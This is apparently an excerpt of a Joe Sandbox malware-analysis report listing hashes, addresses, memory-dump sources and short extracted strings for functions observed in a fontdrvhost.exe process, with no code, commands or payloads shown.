Opcode ID: 7701f8456bd58bfa4744ce5fb1d91b596514878c3aae87ff0898706f2a86e41a
Instruction ID: a07ad19b1aaa34058b89c654808bfb88d22619575cb349f7a261dbfc7d2cf6ee
Opcode Fuzzy Hash: 7701f8456bd58bfa4744ce5fb1d91b596514878c3aae87ff0898706f2a86e41a
Instruction Fuzzy Hash: C0E09220709B884FC70DA62848684207BF1EFAA20278A42EBC005CB2A3ED19DC89C741

Function 00007FFD9B8A4A93 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc371ec160168cd39696a4658f553f3061aafaa4a711842f765bb6b4ea0a0e0b
Instruction ID: fd82295baa933ac39da84980254786897a06c0d67b7e4eefaf508526c093b0a1
Opcode Fuzzy Hash: dc371ec160168cd39696a4658f553f3061aafaa4a711842f765bb6b4ea0a0e0b
Instruction Fuzzy Hash: 64F03731B0D50E8BEE64EB88D4506B93291EB8C351F164579D44EC32D7DE38AA468690

Function 00007FFD9B8C6BE6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d657033e7f1e42707a2fd1899084cb3edd43e1e2f0408bbae95c4a1d20cc0d7b
Instruction ID: b1f145deeac4e623ca810904af43e44328c55d6181578462ada5dbba2a8ca58c
Opcode Fuzzy Hash: d657033e7f1e42707a2fd1899084cb3edd43e1e2f0408bbae95c4a1d20cc0d7b
Instruction Fuzzy Hash: CAE09271B095198BE728A718C4A07B53281FB9C310F12517AC04ED32E3DA386E4285C1

Function 00007FFD9B8CA4C9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9715cb128ca777300d120e418b9a8cca8ba5427e6d43e31375aec8a3ab90a64
Instruction ID: f5789e83cd0411df37cd9867f4405001acf82aa4eab888cdc1c01bc0b8e156d8
Opcode Fuzzy Hash: b9715cb128ca777300d120e418b9a8cca8ba5427e6d43e31375aec8a3ab90a64
Instruction Fuzzy Hash: 9FE04F2160A7C44FC70AA7688C699503FB1DE6B21174A41DBC045CB6B3E919C849C742

Function 00007FFD9B8906F2 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
Instruction ID: 37b106a7befe78c09ab626c497e57741f9e0581a714484db4a7ea9cc829430fd
Opcode Fuzzy Hash: d20051572f8ab65bbc61363d2ae0d262ba6f41f2c51e5cea1e06876f8bc17ab4
Instruction Fuzzy Hash: B8E0D841D5F34E05EA1322BD58760AC7E541F9A614F9600B3D44D460B2B88D22990652

Function 00007FFD9B8C9FA0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8C9F10 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8C7339 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9cd5ed10895c86a932a75d72643b9f5da2da9c751ea2b5407b6f0cc95d6473
Instruction ID: 3ceb73b4dd35ad601519a4f76cb6aafe890dfa9db5c4d6e9a3c339b50593d7d9
Opcode Fuzzy Hash: 5e9cd5ed10895c86a932a75d72643b9f5da2da9c751ea2b5407b6f0cc95d6473
Instruction Fuzzy Hash: 4AE04F6594F7C04FC74B9B3488B88547F60EE1B21078E41EBC085CF1B3DA199849C711

Function 00007FFD9B8C8969 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff413a3a33e9fbe758018eca7c1dbab9a284825c894f32a494da261e893d4b17
Instruction ID: 8a5608cc03d82900ad6dd234a198c9f1685f9c0a38ed184c47e643450d133f4f
Opcode Fuzzy Hash: ff413a3a33e9fbe758018eca7c1dbab9a284825c894f32a494da261e893d4b17
Instruction Fuzzy Hash: 6EE0EC6150A7844FC70A972488699403FB0EE2721178B01C7D445CF5B3E6199D89C752

Function 00007FFD9B896F2A Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
Instruction ID: 440875f1c3495205946f349d650d2e2f573cb0fb0432b7f4fec91baa1984ef99
Opcode Fuzzy Hash: caf9769b7db13766396f1f893b08372476b355b1bf395917b3d0e5c4e8990cee
Instruction Fuzzy Hash: D1E0E521F2A01E4AFF76A794C8717F966A1AF9C700F1600B4D90E932E2DD286F418A40

Function 00007FFD9B8CC709 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7ef217ff4eb5492b83989716709550b202ca7335e70157406d0969c6ea17a95
Instruction ID: 36e05b11841ccc0108c04ef1526e9495c6b2bfb95a32280b77367358f88b65e1
Opcode Fuzzy Hash: e7ef217ff4eb5492b83989716709550b202ca7335e70157406d0969c6ea17a95
Instruction Fuzzy Hash: B5E0173150A7884FC70AAB649CA99943FB0EF6B21178B01D7D005CB6B3EA1D8D89C752

Function 00007FFD9B8C17F0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9B8C6900 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction ID: 9e91538d33bcf1ff31d1daf3e935f11fa6aad565d4a6797f9193c71a5b089275
Opcode Fuzzy Hash: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction Fuzzy Hash: 18D01234B519044FC71CBB3888598747391EB6E2167D540A9E40BC72B1D96ADD89C781

Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
Instruction ID: e3cda102633bb93f13e9d23eecef5d75909da143b8c742f02d37231c5f53ca1b
Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
Instruction Fuzzy Hash: 6EC04C06F6B61F41FC3677EE98660ACA9405FDDE10FD70172D54D400F59D4D22D50156

Function 00007FFD9B8A4486 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb17bf96a01563e36a4810c3121020d6c96c92632c0073b75138b8da8868e2a
Instruction ID: 46163ef23df48f766b075f4b8911b4e50c5463132f318969987cd1f80bb83601
Opcode Fuzzy Hash: 0eb17bf96a01563e36a4810c3121020d6c96c92632c0073b75138b8da8868e2a
Instruction Fuzzy Hash: 65D06720E2955A8AEB58AB94D865ABDA6B1FF44304F400175D0299A2DEDF7825014741

Function 00007FFD9B8912E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
Instruction ID: a842983edc11aa207099163a2db317fdacf31f9b71b22df78cda08294cf257ce
Opcode Fuzzy Hash: 0dc822a51c0cabe518198916ba3302ac1d1f88faaf127e41e827fa079888f130
Instruction Fuzzy Hash: 8DC08C3452180C8FC908EB28C88480437A0FB0E300BC200D0E408C7170D22ADCC1C780

Function 00007FFD9B890B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
Instruction ID: b7c12546d953506ea2988d63a4604157626053400403b06695e3cd1b69b8850c
Opcode Fuzzy Hash: 4e80f6b96130f5d7351ae104d3d6270a63f24a102d3fc2d6494240c327d15f15
Instruction Fuzzy Hash: 96C08C305118088FC904F72CC98480036E0FB0D210BC20190E00EC7174E21A9C90C708

Function 00007FFD9B8950E2 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a67527e07ab606bb55a84f40f91a289e84c2e3ab0f43b028bd5ce63b539a7f
Instruction ID: e550e1f52ac6efe91f66f480f86679393129b10c742f7a4e44bd02aa9424413a
Opcode Fuzzy Hash: 62a67527e07ab606bb55a84f40f91a289e84c2e3ab0f43b028bd5ce63b539a7f
Instruction Fuzzy Hash: F1C00205F1881A06E66A665858725AE48929B44605F960174E01AD66CACD1C5E021286

Function 00007FFD9B894846 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction ID: 0c4e204c538c454e802ae9c919208580580947423b2123857e325c27a960735f
Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction Fuzzy Hash: 09C09225E2D05D45EF35A7B0C8263BA76516F69208F5B8AB3806FA6092DD286A415580

Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction ID: 1d9f8bd6d6adcdb907527511e4359e075298aa56e918e12f664cf8e3d49fc676
Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction Fuzzy Hash: CDB01200E6740F00EC2433FA089206478405B4C500FC200B0E80D400A5984D22940242

Function 00007FFD9B8C7F20 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a9ccc05a214523d948bc7d4f65cd7fcb377f74db3e39bb40074f6e3e682ff6
Instruction ID: 806288d09c858857e980ea50b693c17f4a717ae1b9cb3ed9b7a389c929f2b684
Opcode Fuzzy Hash: 97a9ccc05a214523d948bc7d4f65cd7fcb377f74db3e39bb40074f6e3e682ff6
Instruction Fuzzy Hash: 6FA00248DA780E01D91936FA1E970A474549B8D116FC62661E90880196E88E16E942DB

Non-executed Functions

Function 00007FFD9B8A05D3 Relevance: 5.2, Strings: 4, Instructions: 225COMMON

Download Yara Rule

Strings

K=M, xrefs: 00007FFD9B8A076F
_[>, xrefs: 00007FFD9B8A065E
>M_^, xrefs: 00007FFD9B8A0601
M_^b, xrefs: 00007FFD9B8A077A

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: >M_^$M_^b$_[>$K=M
API String ID: 0-990317550
Opcode ID: cebc097ee451755a7ed9b46e671a7d97ddcc60ff29868cbfcb2ff1ce228ec6c1
Instruction ID: 9357f7be5acf496bff615035a408f7f6dfdb38eff3d7cbbe57033adacfea1541
Opcode Fuzzy Hash: cebc097ee451755a7ed9b46e671a7d97ddcc60ff29868cbfcb2ff1ce228ec6c1
Instruction Fuzzy Hash: 03517093B0843A84E21E32AD7E5A9FD7704DF8137DB4447B7E16E8A0CB6C5C648361D9

Function 00007FFD9B8C8B2D Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

J_^M, xrefs: 00007FFD9B8C8B72
J_^F, xrefs: 00007FFD9B8C8B6A
J_^T, xrefs: 00007FFD9B8C8B7A
J_^?, xrefs: 00007FFD9B8C8B62

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: J_^?$J_^F$J_^M$J_^T
API String ID: 0-115975086
Opcode ID: 777123db1a294147c282865d937ba707560efb223ef43eccb97690ddf41da6bf
Instruction ID: 602fa7cb951474842565e8386975eac24ac4c7eb0f68bdc7fc4025e67a5c7f5a
Opcode Fuzzy Hash: 777123db1a294147c282865d937ba707560efb223ef43eccb97690ddf41da6bf
Instruction Fuzzy Hash: 7E214CB770813789D30E77BCB9558F82385EF8036C70845F7D0AE8B0D79D15284646D4

Analysis Process: fontdrvhost.exePID: 6324, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B8A0D48 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFD9B8A0DF3

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 495fa33f7135a4c2d61ee77c40c01c27ab9b48f1e2cee74dfad0f8ac62783832
Instruction ID: f9c7f9fc1c838139e96d9734c739045b333c28b014cbb5df142facf08739000f
Opcode Fuzzy Hash: 495fa33f7135a4c2d61ee77c40c01c27ab9b48f1e2cee74dfad0f8ac62783832
Instruction Fuzzy Hash: 75910572A29A8E8FE759DB6888797A97FE1FB5A704F4001BAD019D72D6EF781411C300

Function 00007FFD9BC9944F Relevance: .7, Instructions: 737COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6025f25b102d5cfcd12adf6f390dae0c7853cc60684f64eaa7419ec36f1f78c
Instruction ID: e3e7477bdc61cd1f21ffb49201b84d8aaa611a934197ca2ac089b54cbcbc620a
Opcode Fuzzy Hash: d6025f25b102d5cfcd12adf6f390dae0c7853cc60684f64eaa7419ec36f1f78c
Instruction Fuzzy Hash: 4852C130A196498FEB6CCF68C4A86BD77A1FF58300F5145BDD45EC739ACA78A981CB40

Function 00007FFD9B8A0E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b33dd409583976e2f5e4e530cc182735a79e7df16d2d7e2fc485c27f3774f26
Instruction ID: 11fe45237c621ca4d2f2eb5b8323a7f8b388be7083dc484ee5b6c7745c42880d
Opcode Fuzzy Hash: 4b33dd409583976e2f5e4e530cc182735a79e7df16d2d7e2fc485c27f3774f26
Instruction Fuzzy Hash: 2C51E172A2994E8AE79CDB5C88697B9BFE0EB8A714F4002BED019D32D5DB7914118300

Function 00007FFD9B8A0B3F Relevance: 3.8, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9B8A0B46
!k9, xrefs: 00007FFD9B8A0B4E
c9, xrefs: 00007FFD9B8A0B56

Memory Dump Source

Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 8060530394fdff4f960ee9cc255e7e246673dd1eb14ffbc4972a1e0e5936e8ec
Instruction ID: 2ac9d3d5b37b9d89e05c4565c11d28c5889de7f93a377dedb0eecd4f0ca177d7
Opcode Fuzzy Hash: 8060530394fdff4f960ee9cc255e7e246673dd1eb14ffbc4972a1e0e5936e8ec
Instruction Fuzzy Hash: 6EF0F43772A91E8BC7006B7EB8905E9B780EB9A236BD503BBD504C7291E611181A87D0

Function 00007FFD9BC93E28 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC93EA2

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 740fa53be062aa196013775336c201f0a8017801838aff035c9cbcab79028f5f
Instruction ID: c57462273a8d22560bfc530211fe41ff4d23de2574aa3be6188e53b870e28462
Opcode Fuzzy Hash: 740fa53be062aa196013775336c201f0a8017801838aff035c9cbcab79028f5f
Instruction Fuzzy Hash: C6516D31E1964E8FEB59DBA8C4655BDBBB1EF84300F1141BAD01EE729ACB346A01CB40

Function 00007FFD9BC991D8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC99252

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 68571c0a59f83f61ceaa41f0b0e995183a5c425050f154a3ef9e95ad400106e7
Instruction ID: caa910a9a458e329b50a1cbe90acfd268a97711e5e5764a317b277b7d53cafe9
Opcode Fuzzy Hash: 68571c0a59f83f61ceaa41f0b0e995183a5c425050f154a3ef9e95ad400106e7
Instruction Fuzzy Hash: 56514C31E0964E9FEB68DBA8C4695FDB7B1FF55300F5140B9C01AE73A6CA746A01CB41

Function 00007FFD9BC91337 Relevance: .5, Instructions: 538COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b82be4ac1d17682dbea21566ff7de6b20fd0e038e2f36120974c62cbe100be2
Instruction ID: b12cc52168d1a877712249467de5c93e60bb36419ca42666d33a656d0a9ec9c3
Opcode Fuzzy Hash: 8b82be4ac1d17682dbea21566ff7de6b20fd0e038e2f36120974c62cbe100be2
Instruction Fuzzy Hash: CC21D456F0F19FA6F63966F828374FC1A50AF51720F5B01B7D05F860EADC0C2A455392

Function 00007FFD9BC9409F Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e2fcfacbf43ab9b450b9f06af09179d0b6f08a55cf66e66ed51f2b764da6bc
Instruction ID: 66c7f996fb505d9a8155286b3684473c901b2f86122bbfc57030b8ac07c38c1e
Opcode Fuzzy Hash: 99e2fcfacbf43ab9b450b9f06af09179d0b6f08a55cf66e66ed51f2b764da6bc
Instruction Fuzzy Hash: F9F1D33061955A9FEB68CF68C4E15B83BA1FF45300B5541BDC84ECB69FCA38E982CB41

Function 00007FFD9BC9A491 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f257e6535bfd1e0471a33854d2a054d74325cbebe47989ce8c108ea8eec9d94a
Instruction ID: 656bb5de47b60a4e2c8e2f2b609bc9c312c85e72166d467699a966a57cc41c53
Opcode Fuzzy Hash: f257e6535bfd1e0471a33854d2a054d74325cbebe47989ce8c108ea8eec9d94a
Instruction Fuzzy Hash: F9D10634B0EA0E8FE378DB64D4A557977E1FF44300B15457EE48EC36AADE28B9428741

Function 00007FFD9BC950E1 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86efd08d848230fe5ad8f1a94079580d0b64dd7233f9e629db5b87ddfed6806
Instruction ID: 1d31a9a1e33f4da50719e2123814723a5637b6bac7d0007d81e56274cd1253a5
Opcode Fuzzy Hash: d86efd08d848230fe5ad8f1a94079580d0b64dd7233f9e629db5b87ddfed6806
Instruction Fuzzy Hash: 25D1F130B0EB4A8FE378DB78D4A157977E1FF44300B25457EC48EC76AADA29B9428741

Function 00007FFD9BDCCEF2 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af015cc2917bdb36b41e167f43515fa24ed2c2491ea8d093252050e0c63a0290
Instruction ID: afa1b2f6a9b4df203de67376cd94152e1823a3a6ec95e187f6ff21fb896aadfa
Opcode Fuzzy Hash: af015cc2917bdb36b41e167f43515fa24ed2c2491ea8d093252050e0c63a0290
Instruction Fuzzy Hash: 78C14231718D094FDB8CFA389469EB573D2EFA970071545A9E11AC72E6DE24EC42C781

Function 00007FFD9BC940BF Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
